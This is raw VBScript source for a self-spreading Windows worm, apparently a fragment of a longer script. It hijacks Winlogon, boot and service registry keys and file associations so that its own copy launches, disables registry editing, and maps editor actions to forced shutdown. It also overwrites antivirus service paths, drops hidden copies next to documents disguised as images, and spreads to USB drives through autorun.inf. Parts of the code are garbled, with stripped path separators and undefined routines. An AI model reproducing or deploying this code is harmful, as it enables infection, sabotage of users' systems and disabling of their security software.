.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonUserinit", "C:WINDOWSsystem32userinit.exe, c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonshell", "explorer.exe, c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerBootExecute", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerEnvironmentComSpec", "%SystemRoot%system32cmd.exe, c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPugPlayImagePath", "%SystemRoot%system32services.exe, c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootAlternateShell", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicessrserviceImagePathservice", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNPFMntorImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNSCServiceImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSAVScanImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNPFMntorImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSNDSrvcImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSPBBCDrvImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSPBBCSvcImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcDetect.exeImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcShieldImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMcTskshd.exeImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcupdmgr.exeImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServerImagePath", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootAlternateShell", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_LOCAL_MACHINESYSTEMControlSet001ServicessrserviceImagePathservice", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTregeditShellopenCommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTregfileShellopencommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTregfileShelleditcommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTregeditShellopenCommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTregfileShellopencommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTregfileShelleditcommand", "c:windowssvchost.exe " & qi

.RegWrite "HKEY_CLASSES_ROOTVBEFile", "JPEG Image", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBSFile", "File Folder", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTexefile", "my_mimi", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBEFileFriendlyTypeName", "JPEG Image", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBSFileFriendlyTypeName", "File Folder", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTtxtfileileFriendlyTypeName", "my_mimi documentation", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBEFileDefaultIcon", dear.RegRead("HKEY_CLASSES_ROOTjpegfileDefaultIcon")

.RegWrite "HKEY_CLASSES_ROOTVBSFileDefaultIcon", dear.RegRead("HKEY_CLASSES_ROOTFolderDefaultIcon")

.RegWrite "HKEY_CLASSES_ROOTVBEFileShellEditCommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBSFileShellEditCommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTVBSFileShellOpenCommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTVBEFileShellOpenCommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellOpen", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellOpencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTMsi.PackageshellRepaircommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTMsi.PatchshellOpencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTbatfileshellopencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTbatfileshelleditcommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTcomfileshellopencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTcplfileshellcplopencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTcplfileshellrunascommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTinffileshellInstall", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTinffileshellInstallcommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTinffileshellopencommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTtxtfileshellopencommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTtxtfileScriptEngine", "VBScript.Encode"

.RegWrite "HKEY_CLASSES_ROOTFolderShellScan For VirusesCommand", "c:windowssvchost.exe " & forest

.RegWrite "HKEY_CLASSES_ROOTFolderShellexplorecommandcommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTFolderShellopencommandcommand", "wscript.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshelleditcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshellopencommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshelleditcommandcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"

.RegWrite "HKEY_CLASSES_ROOTApplicationsnotepad.exeshellopencommandcommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.Document.1shellopencommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.Document.1shellopencommandcommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.exeshellopencommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationsWordpad.exeshellopencommandcommand", "c:windowssvchost.exe " & heiji

.RegWrite "HKEY_CLASSES_ROOTApplicationscedt.exeshellopencommand", "c:windowssvchost.exe " & mimi

.RegWrite "HKEY_CLASSES_ROOTApplicationscedt.exeshelleditcommand", "%systemroot%System32Shutdown.exe -s -f", "REG_EXPAND_SZ"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftRegEdt32SettingsReadOnly", 1, "REG_SZ"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftRegEdt32SettingsReadOnly", 1, "REG_SZ"

end with

End Sub

Sub dwozmc()

on error resume next

Dim love, dear, drive, drives, folder, files, file, nama, path, vir, subfolder, meteran, elo, cari

Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))

set drive = love.GetLogicalDrives

For Each drive In drives

If drive.IsReady Then

cari drive & ""

DoEvents

End If

Next

dwozmc()

End Sub

Function cari()

on error resume next

Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))

Set folder = love.GetFolder(path)

nama = folder.name

for each file in folder.files

set elo = love.getfile(File.path)

meteran = (elo.size)/1024

ext = love.GetExtensionName(File.Path)

ext = StrReverse(LCase(ext))

vir = love.getbasename(file.path)

if ext = "sbv" or ext = "ebv" or ext = "cod" or ext = "ftr" or ext = "fdp" or ext = "gpj" then

set broken = love.createtextfile(File.Path & ".vbe", 1)

broken.write lost

set friendship = love.getfile(File.Path & ".vbe")

friendship.Attributes = 33

if file.name = "cotox.vbs" or file.name = "kangen.exe" or file.name = "indra.com" or file.name = "MSOHEV.EXE" or file.name = "SVCH0ST.EXE" or file.name = "WINL0G0N.EXE" or file.name = "Surat_Buat_Presiden.zip" or file.name = "Surat_Buat_Presiden.exe" or file.name = "indra.exe" or file.name = "for_you.exe" or file.name = "indra.pif" or file.name = "hallo.exe" or file.name = "icute.vbs" or file.name = "frzstate.exe" or file.name = "I-Cute.vbs" or file.name = "Perfected_v5.vbe" or file.name = "animasi.exe" or file.name = "C.Stankal.com" then

love.DeleteFile(File.path)

DoEvents

End if

if file.name = "msvbvm60.dll" then

love.RenameFile(File.path & "my_mimi.dll")

DoEvents

End if

if vir = nama and ext = "exe" then

love.DeleteFile(File.path)

end if

DoEvents

For Each Subfolder In Folder.SubFolders

kejar Subfolder.Path

DoEvents

Next

End If

Next

End Function

sub ontrus()

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe desktop.vbs"

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "desktop.vbs")

tf.attributes = 0

set tf=fs.createtextfile(winpath & "desktop.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & "desktop.vbs")

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

set tf = fs.getfile(flashdrive.path &"desktop.vbs")

tf.attributes = 0

set tf = fs.createtextfile(flashdrive.path &"diary_mimi.vbe",2,true)

tf.write mysource

tf.close

set tf = fs.createtextfile(flashdrive.path &"desktop.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(flashdrive.path &"desktop.vbs")

tf.attributes = 39

set tf = fs.getfile(flashdrive.path &"autorun.inf")

tf.attributes = 0

set tf = fs.createtextfile(flashdrive.path &"autorun.inf",2,true)

tf.write atr

tf.close

set tf = fs.getfile(flashdrive.path &"autorun.inf")

tf.attributes = 39

on error resume next

set tf = fs.getfile("c:windowssystem32wscript.exe")

tf.Attributes = 39

set tf = fs.getfile("c:windowssvchost.exe")

tf.Attributes = 0

fs.copyfile "c:windowssystem32wscript.exe", "c:windowssvchost.exe"

set tf = fs.getfile("c:windowssvchost.exe")

tf.Attributes = 39

on error resume next

set tf = fs.getfile("c:windowsEXPL0RER.vbs")

tf.attributes = 0

set tf = fs.createtextfile("c:windowsEXPL0RER.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile("c:windowsEXPL0RER.vbs")

tf.attributes = 39

on error resume next

set tf = fs.getfile("c:windowssystemWinUpdt.vbs")

tf.attributes = 0

set tf = fs.createtextfile("c:windowssystemWinUpdt.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile("c:windowssystemWinUpdt.vbs")

tf.attributes = 39

tf.Close

set sd = createobject("Wscript.shell")

tachoor = "c:windowsEXPL0RER.vbs"

sd.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32", "c:windowssvchost.exe " & tachoor

end if

next

if check <> 1 then

Wscript.sleep 20000

end if

loop while check<>1

set sd = createobject("Wscript.shell")

sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname

end sub
---------------------------------------[akhir scrpt]--------------------